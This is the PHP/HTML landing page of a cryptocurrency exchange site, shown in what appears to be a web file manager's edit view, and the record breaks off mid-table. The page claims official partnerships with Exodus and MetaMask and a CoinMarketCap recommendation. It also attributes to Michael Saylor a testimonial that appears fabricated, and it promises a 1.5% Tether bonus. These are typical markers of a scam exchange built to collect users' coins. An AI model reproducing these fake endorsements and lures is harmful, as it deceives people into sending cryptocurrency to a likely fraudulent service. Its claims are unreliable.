File manager - Edit - /home/infoilmg/nfnen.xyz/index.php
Back
<?php require_once "logic/config.php"; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> <?php echo $site_name; ?> </title> <link rel="shortcut icon" href="assets/ico.png" type="image/x-icon"> <link rel="stylesheet" href="styles/main.css"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=DM+Sans:wght@700&family=Inter:wght@200;300;400;500;600;700;800&display=swap" rel="stylesheet"> </head> <body> <div class="loadingDiv" id="loadingDiv"> <div class="loader">...</div> </div> <nav class="navbar navbar-light navbar-expand-md "> <div class="navFlex centering justify-content-md-center"> <a class="navbar-brand d-md-none d-inline mobLink" href=""><?php echo $site_name; ?></a> <button class="navbar-toggler ml-1" type="button" data-toggle="collapse" data-target="#collapsingNavbar2"> <span class="navbar-toggler-icon"></span> </button> <a class="nav-link mobLink" href="#_"> <p><?php echo $site_name; ?></p> </a> <div class="navbar-collapse collapse justify-content-between align-items-center w-100" id="collapsingNavbar2"> <ul class="navbar-nav mx-auto text-md-center text-left"> <li class="nav-item"> <a class="lng-features nav-link" href="#marketTrend">Features</a> </li> <li class="nav-item"> <a class="lng-pricing nav-link" href="#exchange_section">Pricing</a> </li> <li class="nav-item"> <a class="lng-help nav-link" href="#help" >Help</a> </li> <li class="nav-dark-item nav-item" onclick="changeMode()"> <img id="dark-light-mode" src="" alt=""> </li> <li class="nav-dark-item nav-item" > <select class="select-language"> <option value="en">EN </option> <option value="ru">RU </option> </select> </li> </ul> <button class="lng-exchange-nav navButton" type="button" name="button" onclick="goToForm()">Exchange</button> </div> </div> </nav> <section class="f_section"> <div class="first"> <div class="centering"> <div class=""> <div class="partners"> <div class="coinmarketcap"> <p>Recommended by CoinMarketCap</p> <img src="assets/coinmarketcap.svg" alt=""> </div> <div class="exodus"> <p>Official partnership with Exodus Wallet </p> <img src="assets/exodus.svg" alt=""> </div> <div class="metamask"> <p>Official partnership with Metamask Wallet </p> <img src="assets/metamask.svg" alt=""> </div> <div class="microstrategy"> <p>Worked with Microstrategy</p> </div> </div> <div class="partners_separator"> </div> <div class="title_div"> <h1 class="lng-main-title title">Buy, exchange and sell your Cryptocurrency!</h1> </div> <div class="description_div"> <p class="lng-main-description description">Our new platform allows you to buy, and exchange cryptocurrency on our website! We have the best coursing and lowest fee to receive from our clients!</p> </div> <div class="buttons"> <button class="lng-get-started started" type="button" name="button" onclick="goToForm()">Get started</button> <button class="lng-learn-more learn" type="button" name="button">Learn more</button> </div> </div> <!-- ============================================================= --> <div class="divs"> <div class="divs_left"> <div class="top_coins_first"> <div class="top_coin_div"> <div class="top_coin_div_img_name"> <div class="topcoinimgdiv"><img src="assets/coins/BTC.svg" alt=""></div> <p class="top_coin_name">BTC</p> </div> <div class="top_prices"> <p class="price" id="BTCPrice"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> <p class="change" id="BTCChange"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> </div> </div> <div class="top_coin_separator"></div> <div class="top_coin_div"> <div class="top_coin_div_img_name"> <div class="topcoinimgdiv"><img src="assets/coins/BNB.svg" alt=""></div> <p class="top_coin_name">BNB</p> </div> <div class="top_prices"> <p class="price" id="BNBPrice"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> <p class="change" id="BNBChange"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> </div> </div> <div class="top_coin_separator"></div> <div class="top_coin_div"> <div class="top_coin_div_img_name"> <div class="topcoinimgdiv"><img src="assets/coins/TRX.svg" alt=""></div> <p class="top_coin_name">TRX</p> </div> <div class="top_prices"> <p class="price" id="TRXPrice"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> <p class="change" id="TRXChange"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> </div> </div> <div class="top_coin_separator"></div> <div class="top_coin_div"> <div class="top_coin_div_img_name"> <div class="topcoinimgdiv"><img src="assets/coins/DASH.svg" alt=""></div> <p class="top_coin_name">DASH</p> </div> <div class="top_prices"> <p class="price" id="DASHPrice"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> <p class="change" id="DASHChange"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> </div> </div> </div> <div class="bonusmonusdiv"> <img class="gift" src="assets/gift.svg" alt=""> <p class="lng-bonus15 title">1.5% BONUS WITH TETHER</p> <p class="lng-favourable description"> We can exchange your cryptocurrency to USDT with a favourable rate. <br><br> Roughly speaking, we buy your coins and hold them. By changing coins to USDT, you get ~1.5% to the value you sent. </p> <div class="trons_div"> <img class="trons" src="assets/trons.svg" alt=""> </div> <img class="bonuses" src="assets/bonuses.svg" alt=""> </div> </div> <div class="divs_right"> <div class="supported_assets"> <p class="lng-supportingAssets">Supporting all assets!</p> <img id="supported_assets_img" src="assets/bg_supported_coins.svg" alt=""> </div> <div class="partner_microstrategy"> <img src="assets/partner_microstrategy.svg" alt=""> <div class="citata_div"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-quote" viewBox="0 0 16 16"> <path d="M12 12a1 1 0 0 0 1-1V8.558a1 1 0 0 0-1-1h-1.388c0-.351.021-.703.062-1.054.062-.372.166-.703.31-.992.145-.29.331-.517.559-.683.227-.186.516-.279.868-.279V3c-.579 0-1.085.124-1.52.372a3.322 3.322 0 0 0-1.085.992 4.92 4.92 0 0 0-.62 1.458A7.712 7.712 0 0 0 9 7.558V11a1 1 0 0 0 1 1h2Zm-6 0a1 1 0 0 0 1-1V8.558a1 1 0 0 0-1-1H4.612c0-.351.021-.703.062-1.054.062-.372.166-.703.31-.992.145-.29.331-.517.559-.683.227-.186.516-.279.868-.279V3c-.579 0-1.085.124-1.52.372a3.322 3.322 0 0 0-1.085.992 4.92 4.92 0 0 0-.62 1.458A7.712 7.712 0 0 0 3 7.558V11a1 1 0 0 0 1 1h2Z"/> </svg> <p> <?php echo $site_name; ?> helped us to quickly exchange 1,2 mil$ worth of BTC! </p> </div> <div class="author"> <p class="title_author">Michael Saylor</p> <p class="description_author">Founder, Microstrategy</p> </div> </div> </div> </div> </div> </div> </section> <section class="exchange_section" id="exchange_section"> <div class="centering"> <div class="coins_send"> <p class="lng-you-send coins_coins_title">You send</p> <div class="coins_coins"> <?php $query = $pdo->prepare("SELECT * FROM wallets WHERE forReceive=1 ORDER BY coin"); $query->execute(); $result = $query; foreach ($result as $row) { echo '<div onclick="chooseCoin(\'' . $row['coin'] . '\',1,\'' . $row['coinName'] . '\')" class="coin coin-1 ' . $row['coinName'] . '" id="' . $row['coinName'] . '-1">'; echo '<div><img loading="lazy" src="assets/coins/' . $row['coin'] . '.svg" alt=""></div>'; echo '<div class="coin_text">'; echo '<p>' . $row['coinName'] . '</p>'; echo '</div>'; echo '</div>'; } ?></div> </div> <div class="coins_receive"> <p class="lng-you-receive coins_coins_title">You receive</p> <div class="coins_coins"> <?php $query = $pdo->prepare("SELECT * FROM wallets WHERE forSend=1 ORDER BY coin"); $query->execute(); $result = $query; foreach ($result as $row) { echo '<div onclick="chooseCoin(\'' . $row['coin'] . '\',2,\'' . $row["coinName"] . '\')" class="coin coin-2 ' . $row['coinName'] . '" id="' . $row['coinName'] . '-2">'; echo '<div><img loading="lazy" src="assets/coins/' . $row['coin'] . '.svg" alt=""></div>'; echo '<div class="coin_text">'; echo '<p>' . $row['coinName'] . '</p>'; echo '</div>'; echo '</div>'; } ?> </div> </div> <div class="form_div"> <p class="lng-enter-data coins_coins_title">Enter the data</p> <div class="fields_div"> <div class=""> <p id="error"></p> <label class="lng-you-send2" for="send">You send</label><br> <input name="send" class="lng-you-send-placeholder" type="number" id="inputAmount" oninput="processChange()"> </div> <div class=""> <label class="lng-you-receive2 " for="receive">You receive</label><br> <input name="receive" type="text" id="receiveInput" disabled> </div> <!-- <div class="user_email_div"> <label for="mail">Your mail</label><br> <input id="email" type="mail" name="mail" value="" class="lng-your-email-placeholder user_email" oninput="typing('errorEmail')"> <p id="errorEmail" class="lng-invalid-email"></p> </div> --> <div class="user_wallet_div"> <label class="lng-your-wallet" for="wallet">Your wallet</label><br> <p id="errorWallet" class="lng-invalid-wallet"></p> <input id="walletAddress" type="text" name="wallet" value="" class="lng-your-wallet-placeholder user_wallet" oninput="typing('errorWallet')"> <p id="errorWallet" class="lng-invalid-wallet"></p> </div> <div class="user_promo_div"> <div class=""> <label class="lng-promocode" for="wallet">Promocode</label><br> <div class="promoinputandbutton"> <input id="promocode" type="text" name="promocode" value="" class="lng-promocode-placeholder user_wallet" oninput="removeError()"> <button id="promoBtn" type="button" name="button" onclick="activatePromo()"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-check" viewBox="0 0 16 16"> <path d="M10.97 4.97a.75.75 0 0 1 1.07 1.05l-3.99 4.99a.75.75 0 0 1-1.08.02L4.324 8.384a.75.75 0 1 1 1.06-1.06l2.094 2.093 3.473-4.425a.267.267 0 0 1 .02-.022z"/> </svg> </button> </div> </div> <p id="errorWallet" class="lng-invalid-wallet"></p> </div> <div class=""> <p id="rate_p"></p> </div> <div class="exchange_button_div"> <button id="exchangeBtn" type="button" name="button" class="lng-go-to-payment" onclick="exchange()">Continue the operation</button> </div> </div> </div> </div> </section> <section id="marketTrend" class="trending_section"> <div class="trending_title centering"> <p class="lng-market-trends">Market trends & news</p> </div> <div class="centering trending_divs"> <div class=""> <div class="trend_div_title"> <img src="assets/trend-1-title.svg" alt=""> <p class="lng-trending-now">Trending now!</p> </div> <div class="trending_now_coins"> <div class=""> <div><p class="trendingCoinNmb">1</p><img src="assets/coins/BNB.svg" alt=""> <p class="tcoinname"><strong>Binance Chain</strong>BNB</p> </div> <p id="BNBtrendingPercentage"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> </div> <div class=""> <div><p class="trendingCoinNmb">2</p><img src="assets/coins/BTC.svg" alt=""><p class="tcoinname"><strong>Bitcoin</strong>BTC</p></div><p id="BTCtrendingPercentage"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> </div> <div class=""> <div><p class="trendingCoinNmb">3</p><img src="assets/coins/DASH.svg" alt=""><p class="tcoinname"><strong>Dash</strong>DASH</p></div><p id="DASHtrendingPercentage"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> </div> </div> </div> <div class="newd"> <img class="newnew" src="assets/our-news.svg" alt=""> <div class="trend_div_title"> <img src="assets/trend-2-title.svg" alt=""> <p class="lng-newly-added">Newly added</p> </div> <div class="trending_now_coins"> <div class=""> <div><p class="trendingCoinNmb">1</p><img src="assets/coins/XMR.svg" alt=""> <p class="tcoinname"><strong>Monero</strong>XMR</p> </div> <p id="XMRtrendingPercentage"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> </div> <div class=""> <div><p class="trendingCoinNmb">2</p><img src="assets/coins/DOGE.svg" alt=""><p class="tcoinname"><strong>Dogecoin</strong>DOGE</p></div><p id="DOGEtrendingPercentage"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> </div> <div class=""> <div><p class="trendingCoinNmb">3</p><img src="assets/coins/XRP.svg" alt=""><p class="tcoinname"><strong>Xrp</strong>XRP</p></div><p id="XRPtrendingPercentage"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </p> </div> </div> </div> <div class=""> <div class="trend_div_title"> <img src="assets/trend-3-title.svg" alt=""> <p class="lng-more-support">More support to assets</p> </div> <div class="supportAssets"> <p class="lng-always-updating description">We are always updating our platform.</p> <img src="assets/supportedAssets.svg" alt=""> <p class="lng-exchange-new new" onclick="goToForm()">Exchange new assets ></p> </div> </div> </div> <div class="trending_title hypedCoinsTitle centering"> <p class="lng-hyped">Lifetime <span class="inGreen">hyped</span> cryptocurrency coursing</p> </div> <div class="coursing centering hypedCoins"> <table> <tr> <th>Name</th> <th>Price</th> <th>24h change</th> <th>Dynamic</th> </tr> <tr> <td class="tableName"> <div class=""> <p>1</p> </div> <div class=""> <img src="assets/coins/BTC.svg" alt=""> </div> <div class=""> <p>Bitcoin</p> </div> </td> <td id="BTChypedPrice"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </td> <td id="BTChypedPercentage"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </td> <td><img src="https://s3.coinmarketcap.com/generated/sparklines/web/7d/2781/1.svg" alt=""> </td> </tr> <tr> <td class="tableName"> <div class=""> <p>2</p> </div> <div class=""> <img src="assets/coins/BNB.svg" alt=""> </div> <div class=""> <p>BNB</p> </div> </td> <td id="BNBhypedPrice"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </td> <td id="BNBhypedPercentage"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 